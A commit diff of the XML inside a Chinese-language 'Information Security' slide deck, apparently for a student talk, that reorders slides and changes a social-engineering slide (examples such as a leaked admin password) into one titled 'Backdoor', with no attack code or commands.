<commit_message>
Qing hua da xue shu yuan
</commit_message>
<xml_diff>
--- a/Information Security.pptx
+++ b/Information Security.pptx
@@ -10,13 +10,13 @@
     <p:sldId id="259" r:id="rId4"/>
     <p:sldId id="262" r:id="rId5"/>
     <p:sldId id="263" r:id="rId6"/>
-    <p:sldId id="260" r:id="rId7"/>
-    <p:sldId id="267" r:id="rId8"/>
-    <p:sldId id="261" r:id="rId9"/>
-    <p:sldId id="265" r:id="rId10"/>
-    <p:sldId id="264" r:id="rId11"/>
-    <p:sldId id="266" r:id="rId12"/>
-    <p:sldId id="269" r:id="rId13"/>
+    <p:sldId id="269" r:id="rId7"/>
+    <p:sldId id="264" r:id="rId8"/>
+    <p:sldId id="260" r:id="rId9"/>
+    <p:sldId id="267" r:id="rId10"/>
+    <p:sldId id="261" r:id="rId11"/>
+    <p:sldId id="265" r:id="rId12"/>
+    <p:sldId id="270" r:id="rId13"/>
     <p:sldId id="268" r:id="rId14"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
@@ -274,7 +274,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -445,7 +445,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -626,7 +626,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -797,7 +797,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -991,7 +991,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1280,7 +1280,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1703,7 +1703,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1823,7 +1823,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1921,7 +1921,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2199,7 +2199,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2457,7 +2457,7 @@
           <a:p>
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2682,7 +2682,7 @@
             <a:fld id="{4665E195-C89C-4871-8AE9-903FDB8B6D9D}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>5/27/2020</a:t>
+              <a:t>5/28/2020</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3173,6 +3173,13 @@
   <p:clrMapOvr>
     <a:masterClrMapping/>
   </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
 </p:sld>
 </file>
 
@@ -3198,7 +3205,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B343474C-0735-45F4-AD70-C4D66D4EB92B}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{009A4191-8546-4753-B6B7-1268854A10A1}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -3219,14 +3226,28 @@
                 <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                 <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
               </a:rPr>
-              <a:t>社交工程 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(Social Engineering)</a:t>
+              <a:t>後門 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>Backdoor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-CA" dirty="0">
               <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
@@ -3240,1749 +3261,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0143805-285A-4BE2-8E47-16A12C1BFAC9}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>概念</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>智障網管。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>舉例</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>午餐系統</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>—</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>意外把最高權限密碼公開</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>吳邦寧</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>—</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>糟糕的電腦使用習慣</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2151663149"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF886117-9550-4988-908F-0732F1AAE8A1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>社交工程 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(Social Engineering)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBB201B2-6646-41FD-A896-F00172B147D7}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>慘案</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4DB6768-80D9-46FA-830D-DCC4FA661E20}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill rotWithShape="1">
-          <a:blip r:embed="rId2"/>
-          <a:srcRect l="61858" t="23486" r="23830" b="63303"/>
-          <a:stretch/>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="838200" y="2906624"/>
-            <a:ext cx="3171038" cy="1646501"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="9" name="Picture 8">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8E3C58-E941-45EC-8923-DCCE6FB8BE8C}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5629886" y="2177963"/>
-            <a:ext cx="5823759" cy="3240640"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:effectLst>
-            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
-              <a:prstClr val="black">
-                <a:alpha val="40000"/>
-              </a:prstClr>
-            </a:outerShdw>
-          </a:effectLst>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3829621397"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="標題 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="內容版面配置區 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1638728513"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60CBAE8C-1607-4DCA-B7CA-EE4DC857CDE5}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>結尾</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F261C513-5033-4178-828E-E4AAAA247642}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>不要做壞事</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" strike="sngStrike" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>就算做了壞事，也不要被抓到</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" strike="sngStrike" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1625167004"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="13" name="Title 12"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>在開始之前</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
